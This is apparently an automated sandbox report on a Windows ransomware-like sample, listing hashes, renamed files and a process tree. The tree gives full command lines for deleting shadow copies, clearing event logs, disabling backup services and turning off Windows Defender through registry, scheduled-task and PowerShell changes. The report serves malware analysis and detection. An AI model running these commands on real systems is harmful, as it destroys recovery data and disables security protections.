Resubmissions
- 13-01-2022 14:14 | 220113-rj8ymsagb4 | 10
- 13-01-2022 11:04 | 220113-m6crhahfgj | 10
- 13-01-2022 10:58 | 220113-m3a4hahef9 | 10
Analysis
- max time kernel: 48s
- max time network: 14s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 13-01-2022 11:04
Static task
static1
Behavioral task
behavioral1
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win10-en-20211208
General
- Target: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
- Size: 2.5MB
- MD5: 8fdfa1997b566f6e086c29e33935dcc5
- SHA1: 178fbe1c8fc1a6e3440215d668797699f94a4bef
- SHA256: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
- SHA512: b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes (pid, process):
  1824 MpCmdRun.exe
-
Modifies security service 2 TTPs 1 IoCs
Processes (description, ioc, process):
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes (description, ioc, process); the process for every entry is cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe:
  File opened for modification C:\Program Files\Common Files\System\ado\msado28.tlb
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sK9Z6uVqgCA0.fmu9d
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ktQG2gupiNg0.fmu9d
  File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wzbAmmSTcUc0.fmu9d
  File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui
  File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_MhONk5VDv180.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_HYlCkFtTUwI0.fmu9d
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png
  File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_5CMJabjKdpM0.fmu9d
  File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_irmsRX9qs740.fmu9d
  File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_q81bQfQ2f1Y0.fmu9d
  File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NoEGqOHMJWk0.fmu9d
  File opened for modification C:\Program Files\7-Zip\7z.sfx.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_cwXQgAQAQfI0.fmu9d
  File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv
  File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_BlfwRvA2pzs0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_VipML3zsbvg0.fmu9d
  File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_kpWy3fnCXck0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_eLG0CqoMiTA0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_hN6tnWzTRKA0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ywVQAU2fjic0.fmu9d
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_4oAyxzhVM1g0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_n4jsJOo2n8k0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NugW263pHY40.fmu9d
  File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LntGZXJ11zc0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Bwbzt3M7wMw0.fmu9d
  File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_WUEr4Y1hm8Y0.fmu9d
  File opened for modification C:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui
  File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_fE2zslmI26w0.fmu9d
  File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipTsf.dll.mui
  File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uf0jDBkID040.fmu9d
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_6_Z3hoH2DiM0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LeKKP-R4cPM0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sMANohA3BTY0.fmu9d
  File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_z3Qsr1ZexBk0.fmu9d
  File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_urNWfzniZow0.fmu9d
  File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_rfnb0gdSkok0.fmu9d
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png
  File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif
  File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\THMBNAIL.PNG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_bOvj6YDEwaI0.fmu9d
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_vBYlIJuWoGY0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Ksfl8zQYAyQ0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_yC8Io2umc9c0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_qnbAWbrVUAU0.fmu9d
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uniYPXU4nnQ0.fmu9d
  File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NEKuOA9cTA40.fmu9d
  File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_xcOR5JuLIaI0.fmu9d
  File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png
  File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Tn8rNgR3ZQk0.fmu9d
  File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png
  File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wqyP41r4tuQ0.fmu9d
  File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MSTAG.TLB.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_tU27Jl307qQ0.fmu9d
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid, process):
  1328 vssadmin.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes (pid, process):
  1376 powershell.exe
  972 powershell.exe
  1916 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (description, pid, process), grouped by process and pid in the order recorded:
  wevtutil.exe pid 700: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
  wevtutil.exe pid 1768: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
  wevtutil.exe pid 472: Token: SeSecurityPrivilege; Token: SeBackupPrivilege
  wmic.exe pid 1776: Token: SeIncreaseQuotaPrivilege; SeSecurityPrivilege; SeTakeOwnershipPrivilege; SeLoadDriverPrivilege; SeSystemProfilePrivilege; SeSystemtimePrivilege; SeProfSingleProcessPrivilege; SeIncBasePriorityPrivilege; SeCreatePagefilePrivilege; SeBackupPrivilege; SeRestorePrivilege; SeShutdownPrivilege; SeDebugPrivilege; SeSystemEnvironmentPrivilege; SeRemoteShutdownPrivilege; SeUndockPrivilege; SeManageVolumePrivilege; 33; 34; 35
  wmic.exe pid 1076: Token: SeIncreaseQuotaPrivilege; SeSecurityPrivilege; SeTakeOwnershipPrivilege; SeLoadDriverPrivilege; SeSystemProfilePrivilege; SeSystemtimePrivilege; SeProfSingleProcessPrivilege; SeIncBasePriorityPrivilege; SeCreatePagefilePrivilege; SeBackupPrivilege; SeRestorePrivilege; SeShutdownPrivilege; SeDebugPrivilege; SeSystemEnvironmentPrivilege; SeRemoteShutdownPrivilege; SeUndockPrivilege; SeManageVolumePrivilege; 33; 34; 35
  wmic.exe pid 1076 (second set): Token: SeIncreaseQuotaPrivilege; SeSecurityPrivilege; SeTakeOwnershipPrivilege; SeLoadDriverPrivilege; SeSystemProfilePrivilege; SeSystemtimePrivilege; SeProfSingleProcessPrivilege; SeIncBasePriorityPrivilege; SeCreatePagefilePrivilege; SeBackupPrivilege; SeRestorePrivilege; SeShutdownPrivilege; SeDebugPrivilege; SeSystemEnvironmentPrivilege; SeRemoteShutdownPrivilege; SeUndockPrivilege; SeManageVolumePrivilege; 33
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description, pid, process, target process); each row below is recorded four times in the report:
  PID 1916 wrote to memory of 672 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 672 wrote to memory of 584 | 672 | net.exe | net1.exe
  PID 1916 wrote to memory of 1492 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 1492 wrote to memory of 1364 | 1492 | net.exe | net1.exe
  PID 1916 wrote to memory of 1852 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 1852 wrote to memory of 1116 | 1852 | net.exe | net1.exe
  PID 1916 wrote to memory of 900 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 900 wrote to memory of 1120 | 900 | net.exe | net1.exe
  PID 1916 wrote to memory of 436 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 436 wrote to memory of 1200 | 436 | net.exe | net1.exe
  PID 1916 wrote to memory of 1216 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 1216 wrote to memory of 676 | 1216 | net.exe | net1.exe
  PID 1916 wrote to memory of 1904 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 1904 wrote to memory of 1660 | 1904 | net.exe | net1.exe
  PID 1916 wrote to memory of 632 | 1916 | cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | net.exe
  PID 632 wrote to memory of 1148 | 632 | net.exe | net1.exe
Processes (process tree; indentation shows parent/child depth)
- C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  PID: 1916
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "NetMsmqActivator" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 672
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
      PID: 584
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1492
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "SamSs" /y
      PID: 1364
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1852
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y
      PID: 1116
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 900
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y
      PID: 1120
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 436
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y
      PID: 1200
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1216
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "VSS" /y
      PID: 676
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 1904
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "wbengine" /y
      PID: 1660
  - C:\Windows\SysWOW64\net.exe
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    PID: 632
    - C:\Windows\SysWOW64\net1.exe
      Command line: C:\Windows\system32\net1 stop "WebClient" /y
      PID: 1148
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "NetMsmqActivator" start= disabled
    PID: 1096
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "SamSs" start= disabled
    PID: 1928
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "SDRSVC" start= disabled
    PID: 1720
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "SstpSvc" start= disabled
    PID: 1080
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "UI0Detect" start= disabled
    PID: 1696
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "VSS" start= disabled
    PID: 612
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "wbengine" start= disabled
    PID: 932
  - C:\Windows\SysWOW64\sc.exe
    Command line: sc.exe config "WebClient" start= disabled
    PID: 1944
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    PID: 1736
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    PID: 1704
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    PID: 1240
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    PID: 1648
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    PID: 112
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    PID: 276
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    PID: 1120
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    PID: 1480
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    PID: 1512
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    PID: 1284
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    PID: 1684
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    PID: 1228
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    PID: 1428
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    PID: 1964
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    PID: 868
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    PID: 1796
  - C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    PID: 1484
  - C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    PID: 1728
  - C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    PID: 1620
  - C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    PID: 784
  - C:\Windows\SysWOW64\schtasks.exe
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    PID: 864
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    PID: 1832
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    PID: 1332
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    PID: 2024
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    PID: 1008
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    PID: 1792
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    PID: 1932
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    PID: 1952
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    PID: 1740
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    PID: 1616
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    PID: 776
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    Signatures: Modifies security service
    PID: 1744
  - C:\Windows\SysWOW64\reg.exe
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    PID: 1208
  - C:\Windows\SysWOW64\vssadmin.exe
    Command line: vssadmin.exe delete shadows /all /quiet
    Signatures: Interacts with shadow copies
    PID: 1328
  - C:\Windows\SysWOW64\wevtutil.exe
    Command line: wevtutil.exe cl system
    Signatures: Suspicious use of AdjustPrivilegeToken
    PID: 700
  - C:\Windows\SysWOW64\wevtutil.exe
    Command line: wevtutil.exe cl security
    Signatures: Suspicious use of AdjustPrivilegeToken
    PID: 1768
  - C:\Windows\SysWOW64\wevtutil.exe
    Command line: wevtutil.exe cl application
    Signatures: Suspicious use of AdjustPrivilegeToken
    PID: 472
  - C:\Windows\SysWOW64\Wbem\wmic.exe
    Command line: wmic.exe SHADOWCOPY /nointeractive
    Signatures: Suspicious use of AdjustPrivilegeToken
    PID: 1776
  - C:\Windows\SysWOW64\Wbem\wmic.exe
    Command line: wmic.exe shadowcopy delete
    Signatures: Suspicious use of AdjustPrivilegeToken
    PID: 1076
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    PID: 1316
    - C:\Program Files\Windows Defender\MpCmdRun.exe
      Command line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      Signatures: Deletes Windows Defender Definitions
      PID: 1824
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    PID: 1348
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Set-MpPreference -DisableIOAVProtection $true
      Signatures: Suspicious behavior: EnumeratesProcesses
      PID: 1376
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    PID: 1824
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
      Signatures: Suspicious behavior: EnumeratesProcesses
      PID: 972
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 4e230dd18980fbe3b34c4d3ef2f33f8a
  SHA1: d8236222ce1f417c445c17624e4cffce0abd4137
  SHA256: 109c8a822a3b6d7b6f1010adf0b88c1b38006b1b3e21e689ace3455ccfe1b294
